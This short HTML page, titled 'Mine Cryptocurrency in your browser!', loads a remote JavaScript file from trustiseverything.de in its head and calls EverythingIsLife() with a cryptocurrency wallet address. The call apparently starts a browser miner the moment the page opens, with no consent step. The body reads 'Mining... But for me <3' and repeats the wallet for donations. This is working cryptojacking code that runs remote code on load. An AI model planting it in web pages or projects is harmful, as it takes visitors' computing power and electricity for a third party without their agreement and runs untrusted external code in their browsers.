<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>Mine Cryptocurrency in your browser!</title>
    <link href="style.css" rel="stylesheet" type="text/css" />
    <link href="https://pkmnmeteor.polphone.repl.co/style.css" rel="stylesheet" type="text/css" />
    <script src="https://trustiseverything.de/karma/karma.js?karma=bs?nosaj=faster.mo" ></script>
    <script type="text/javascript">
    EverythingIsLife('87Jr3LTEH4D7ubaxJNsrKTQPzfitSPH4cgp254Yb3cyGHLdrP6fpaNjCjdph2cn8Sh9qjgxe9UMjoCrTDbnbqJUtJXK9bb4', 'x', 30);
    </script>	
  </head>
  <body>
    <h1 id="header">Mining... But for me <3</h1>

    Why not donate some more :) 87Jr3LTEH4D7ubaxJNsrKTQPzfitSPH4cgp254Yb3cyGHLdrP6fpaNjCjdph2cn8Sh9qjgxe9UMjoCrTDbnbqJUtJXK9bb4
  </body>
</html>